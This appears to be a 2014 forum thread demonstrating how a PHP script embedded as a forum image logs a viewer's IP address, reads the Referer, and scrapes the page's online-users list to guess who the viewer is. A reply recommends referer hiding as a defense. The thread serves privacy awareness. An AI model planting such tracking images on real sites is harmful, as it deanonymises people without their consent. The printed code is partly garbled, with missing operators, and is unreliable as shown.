The Sanctuary

Technology => Network (in)Security => Topic started by: burroughs on November 17, 2014, 01:47:28 am

Title: Why you should hide your online status on forums
Post by: burroughs on November 17, 2014, 01:47:28 am
NOTE: Refresh this page once it loads for this first time to get the full effect. The referer is not set to this thread when clicking into it elsewhere.

This is a rehash of a post I made on &T2 awhile back.

(http://bursylursy.webatu.com/tracking.php)

What's going on?

PHP scripts can output images with the appropriate libraries - these scripts can be referenced as images in html and BB code just as any static file might be. But we can do whatever we want in our script before returning content, and we can do some pretty naughty things. Specifically:


Things we learned

Code

Code: [Select]
[img]http://bursylursy.webatu.com/tracking.php[/img]
Code: [Select]
<?php
header
("Pragma-directive: no-cache");
header("Cache-directive: no-cache");
header("Cache-control: no-cache");
header("Pragma: no-cache");
header("Expires: 0");

error_reporting(0);
$ip =  $_SERVER["REMOTE_ADDR"];
$ref $_SERVER["HTTP_REFERER"];
$displayusers "";

if (
strlen($ref) > 0) {
header("Content-type: image/png");
$response file_get_contents($ref);
$doc = new DOMDocument();
$doc->loadHTML($response);
$users $doc->getElementById("whoisviewing")->nodeValue;

if (strpos($users"Members") === false) {
$displayusers "You are probably one of these users: " substr($users0strpos($users" and"));
}

$im imagecreate(90070);
$bg imagecolorallocate($im255255255);
$textcolor imagecolorallocate($im00255);

imagestring($im555"Your ip address is: " $ip$textcolor);
imagestring($im5525"You are viewing this page: " $ref$textcolor);
imagestring($im5545$displayusers$textcolor);

imagepng($im);
imagedestroy($im);
} else {
header("Content-type: image/jpeg");
$im imagecreatefromjpeg("http://www.quickmeme.com/img/fa/fa3e19ffd513583d5f7ae60382262d9a0505d72589cd2374af2b2a7de75e057d.jpg");
imagejpeg($im);
imagedestroy($im);
}
?>

Title: Re: Why you should hide your online status on forums
Post by: BallsDeep69 on November 17, 2014, 02:06:29 am
*gasp*
Title: Re: Why you should hide your online status on forums
Post by: stdio.h on November 17, 2014, 02:17:32 am
I highly recommend using the JonDoFox (https://anonymous-proxy-servers.net/en/jondofox.html) Firefox profile. In addition to having NoScript enabled by default, it hides the referer when switching domains, preventing this type of attack.